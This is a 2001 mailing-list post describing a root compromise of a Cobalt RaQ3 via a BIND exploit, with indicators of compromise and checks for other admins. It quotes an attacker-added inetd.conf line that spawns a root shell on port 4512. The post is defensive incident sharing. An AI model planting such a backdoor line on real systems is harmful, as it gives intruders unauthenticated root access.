We have finished checking our RAQ3 following a serious root hack in February using the Bind exploit. This is what we have found so far by comparing the hacked machine with a good machine: 1) A file called "erkms.tgz" (probably a Trojan rootkit) was found in "/tmp" directory. The file had not been executed. A directory called "erkms" was also created although it was empty. Advice: run a check for the "erkms.tgz" file and directories. Also check for /dev/hdcc /dev/hdbb /dev/ptyq as the presence of these may indicate that the script was at least partly executed. 2) A file called "init" was put into the "/usr/sbin" directory and a process called "init" was activated every 5 minutes by executing the init file from crontab. Two "init" processes were therefore running at the same time. The purpose of the new init process unknown, but it may open port 681. Advice: Check for the ""/usr/sbin/init" file, check your crontab entries and check what processes are running. Look for an "init" process other than that found at PID1 using "ps -ax". 3) A file called "cronlogd" was put into the "/usr/sbin" directory and changes were made to "/etc/rc.d/rc.sysinit" to add the text "/usr/sbin/cronlogd" at the end which launches "cronlogd" as a process. The purpose of the cronlogd process is unknown, but it may open port 32. Advice: Check for "usr/sbin/cronlogd", check the "/etc/rc.d/rc.sysinit" file has not been tampered with and what processes are running using "ps -ax". 4) Changes were made to the file "inetd.conf" and also to the file "inetd.conf.noqpopper", both found in the "/etc" directory. A new line reading "4512 stream tcp nowait root /bin/sh sh -i" was added to both files which opens port 4512. Advice: check what ports you have open using netstat -ap | grep "*:*" Check both of the above files have not been tampered with. 5) We also believe part of the hack was designed to make it impossible for us to update Bind with patches from Cobalt, either through the GUI or using wget. We got stuck at version BIND-8.2.2_P7-C1 until we manually transferred a copy of named BIND-8.2.3-C1 using FTP from a good machine to get the update in place. Advice: Check you have BIND-8.2.3** or better in place using "named -v" from the command line. Anything less is an open door. 6) We have a suspect small text file called "la.pid" in both "root" dir and "/usr/sbin" dir. Web security pages suggest this could be an indicator of whether malicious code has been properly installed or not. It is not found on a good machine. Advice: Try a "locate la.pid" from the command line. Any advice or updates on this last file or the other malicious files or processes is welcome. Needless to say this machine is now going offline for a full re-install. LF _______________________________________________ cobalt-security mailing list [EMAIL PROTECTED] http://list.cobalt.com/mailman/listinfo/cobalt-security
[cobalt-security] February Hack Update
Lawrence Frewin of Accommodation.com Mon, 05 Mar 2001 00:46:21 -0800
- Re: [cobalt-security] February Hack U... Lawrence Frewin of Accommodation.com
- Re: [cobalt-security] February H... Marc Gear
- Re: [cobalt-security] February H... Kevin D
- Re: [cobalt-security] Februa... Mike Coltart
- [cobalt-security] February Hack ... Stoopidcoopid
- Re: [cobalt-security] Februa... Gossi The Dog
